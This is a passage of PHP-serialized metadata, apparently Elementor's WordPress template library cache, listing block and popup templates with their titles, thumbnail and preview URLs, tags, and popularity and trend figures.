14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";i:1520443532;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:10;s:11:\"trend_index\";i:4;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:1;a:14:{s:2:\"id\";i:10107;s:5:\"title\";s:34:\"Classic | Promotion | Announcement\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/balls_small.png\";s:12:\"tmpl_created\";i:1547851373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-promotion-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:247;s:11:\"trend_index\";i:138;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:2;a:14:{s:2:\"id\";i:14790;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Header.png\";s:12:\"tmpl_created\";i:1595315760;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/luxury-real-estate-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"header\",\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:547;s:11:\"trend_index\";i:12;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:3;a:14:{s:2:\"id\";i:5533;s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";i:1520443534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:27;s:11:\"trend_index\";i:8;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:4;a:14:{s:2:\"id\";i:14799;s:5:\"title\";s:38:\"Luxury Real Estate &#8211; single post\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Post.png\";s:12:\"tmpl_created\";i:1595315792;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/luxury-real-estate-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:674;s:11:\"trend_index\";i:131;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:5;a:14:{s:2:\"id\";i:5575;s:5:\"title\";s:5:\"CTA 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_3.png\";s:12:\"tmpl_created\";i:1520443543;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/cta-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:14;s:11:\"trend_index\";i:7;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:6;a:14:{s:2:\"id\";i:14809;s:5:\"title\";s:45:\"Luxury Real Estate &#8211; Properties Archive\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Properties.png\";s:12:\"tmpl_created\";i:1595315826;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/luxury-real-estate-properties-archive/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:93;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:7;a:14:{s:2:\"id\";i:5615;s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";i:1520443551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:30;s:11:\"trend_index\";i:58;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:8;a:14:{s:2:\"id\";i:14816;s:5:\"title\";s:47:\"Luxury Real Estate &#8211; Property single post\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/07/Single-Property-.png\";s:12:\"tmpl_created\";i:1595315847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/luxury-real-estate-property-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:701;s:11:\"trend_index\";i:155;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:9;a:14:{s:2:\"id\";i:5624;s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";i:1520443553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:74;s:11:\"trend_index\";i:185;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:10;a:14:{s:2:\"id\";i:14827;s:5:\"title\";s:39:\"Slide-In | Contact | Luxury Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/PopUp.png\";s:12:\"tmpl_created\";i:1595323523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/slide-in-contact-luxury-real-estate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:707;s:11:\"trend_index\";i:227;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:11;a:14:{s:2:\"id\";i:5684;s:5:\"title\";s:5:\"FAQ 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_1.png\";s:12:\"tmpl_created\";i:1520443565;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:68;s:11:\"trend_index\";i:99;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:12;a:14:{s:2:\"id\";i:10158;s:5:\"title\";s:17:\"Classic | Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/coco_small.png\";s:12:\"tmpl_created\";i:1547852227;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:271;s:11:\"trend_index\";i:236;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:13;a:14:{s:2:\"id\";i:5693;s:5:\"title\";s:5:\"FAQ 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_1.png\";s:12:\"tmpl_created\";i:1520443567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:200;s:11:\"trend_index\";i:190;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:14;a:14:{s:2:\"id\";i:5703;s:5:\"title\";s:6:\"FAQ 13\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_2.png\";s:12:\"tmpl_created\";i:1520443569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/faq-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:28;s:11:\"trend_index\";i:21;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:15;a:14:{s:2:\"id\";i:5711;s:5:\"title\";s:5:\"FAQ 1\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_2.png\";s:12:\"tmpl_created\";i:1520443571;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:190;s:11:\"trend_index\";i:285;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:16;a:14:{s:2:\"id\";i:10190;s:5:\"title\";s:30:\"Classic | Register | Subscribe\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/engage_small.png\";s:12:\"tmpl_created\";i:1547885703;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:249;s:11:\"trend_index\";i:196;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:17;a:14:{s:2:\"id\";i:5719;s:5:\"title\";s:5:\"FAQ 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_3.png\";s:12:\"tmpl_created\";i:1520443573;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:119;s:11:\"trend_index\";i:113;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:18;a:14:{s:2:\"id\";i:5729;s:5:\"title\";s:5:\"FAQ 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_3.png\";s:12:\"tmpl_created\";i:1520443575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:305;s:11:\"trend_index\";i:294;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:19;a:14:{s:2:\"id\";i:5737;s:5:\"title\";s:6:\"FAQ 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_4.png\";s:12:\"tmpl_created\";i:1520443576;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/faq-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:157;s:11:\"trend_index\";i:133;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:20;a:14:{s:2:\"id\";i:5746;s:5:\"title\";s:6:\"FAQ 11\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_4.png\";s:12:\"tmpl_created\";i:1520443578;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/faq-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:194;s:11:\"trend_index\";i:156;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:21;a:14:{s:2:\"id\";i:5755;s:5:\"title\";s:5:\"FAQ 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_5.png\";s:12:\"tmpl_created\";i:1520443580;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:99;s:11:\"trend_index\";i:102;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:22;a:14:{s:2:\"id\";i:5764;s:5:\"title\";s:5:\"FAQ 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_5.png\";s:12:\"tmpl_created\";i:1520443582;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:313;s:11:\"trend_index\";i:275;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:23;a:14:{s:2:\"id\";i:10256;s:5:\"title\";s:20:\"Classic | Sale | Pop\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/fruit_small.png\";s:12:\"tmpl_created\";i:1547888909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:430;s:11:\"trend_index\";i:334;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:24;a:14:{s:2:\"id\";i:5773;s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";i:1520443584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/hero-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:34;s:11:\"trend_index\";i:34;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:25;a:14:{s:2:\"id\";i:10267;s:5:\"title\";s:29:\"Classic | Contact | Christmas\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/christmas_small.png\";s:12:\"tmpl_created\";i:1547889047;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/classic-contact-christmas/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:309;s:11:\"trend_index\";i:234;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:26;a:14:{s:2:\"id\";i:5783;s:5:\"title\";s:7:\"Hero 10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";i:1520443586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/hero-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:339;s:11:\"trend_index\";i:427;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:27;a:14:{s:2:\"id\";i:5792;s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";i:1520443588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:220;s:11:\"trend_index\";i:157;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:28;a:14:{s:2:\"id\";i:5801;s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";i:1520443589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:10:\"[\"header\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:16;s:11:\"trend_index\";i:10;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:29;a:14:{s:2:\"id\";i:5811;s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";i:1520443591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:115;s:11:\"trend_index\";i:154;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:30;a:14:{s:2:\"id\";i:10307;s:5:\"title\";s:43:\"Fly In | Promotion | Christmas | Teddy Bear\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/teddy_small.png\";s:12:\"tmpl_created\";i:1547893266;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/fly-in-promotion-christmas/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:593;s:11:\"trend_index\";i:664;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:31;a:14:{s:2:\"id\";i:5820;s:5:\"title\";s:9:\"Contact 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_white_1.png\";s:12:\"tmpl_created\";i:1520443593;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:174;s:11:\"trend_index\";i:170;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:32;a:14:{s:2:\"id\";i:10318;s:5:\"title\";s:27:\"Classic | Contact | Bicycle\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/01/by_small.png\";s:12:\"tmpl_created\";i:1547893367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/classic-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:345;s:11:\"trend_index\";i:187;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:33;a:14:{s:2:\"id\";i:5828;s:5:\"title\";s:9:\"Contact 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_black_1.png\";s:12:\"tmpl_created\";i:1520443595;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:298;s:11:\"trend_index\";i:360;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:34;a:14:{s:2:\"id\";i:5836;s:5:\"title\";s:10:\"Contact 10\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_white_2.png\";s:12:\"tmpl_created\";i:1520443597;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/contact-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:116;s:11:\"trend_index\";i:64;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:35;a:14:{s:2:\"id\";i:10339;s:5:\"title\";s:22:\"Fly In | Contact | Spa\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/spa_small.png\";s:12:\"tmpl_created\";i:1547893603;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/fly-in-contact-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:398;s:11:\"trend_index\";i:325;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:36;a:14:{s:2:\"id\";i:5844;s:5:\"title\";s:10:\"Contact 11\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_black_2.png\";s:12:\"tmpl_created\";i:1520443599;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/contact-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:286;s:11:\"trend_index\";i:278;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:37;a:14:{s:2:\"id\";i:10352;s:5:\"title\";s:23:\"Fly In | Contact | Wine\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/fly_wine_small.png\";s:12:\"tmpl_created\";i:1547915335;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/fly-in-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:438;s:11:\"trend_index\";i:351;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:38;a:14:{s:2:\"id\";i:5852;s:5:\"title\";s:6:\"CTA 34\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2018/03/form_1.png\";s:12:\"tmpl_created\";i:1520443600;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-34/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"form\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:506;s:11:\"trend_index\";i:574;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:39;a:14:{s:2:\"id\";i:5947;s:5:\"title\";s:7:\"Stats 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_1.png\";s:12:\"tmpl_created\";i:1520443621;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:340;s:11:\"trend_index\";i:309;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:40;a:14:{s:2:\"id\";i:10372;s:5:\"title\";s:29:\"Fly In | Register | Subscribe\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/phone_small.png\";s:12:\"tmpl_created\";i:1547915554;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/fly-in-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:591;s:11:\"trend_index\";i:605;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:41;a:14:{s:2:\"id\";i:5956;s:5:\"title\";s:7:\"Stats 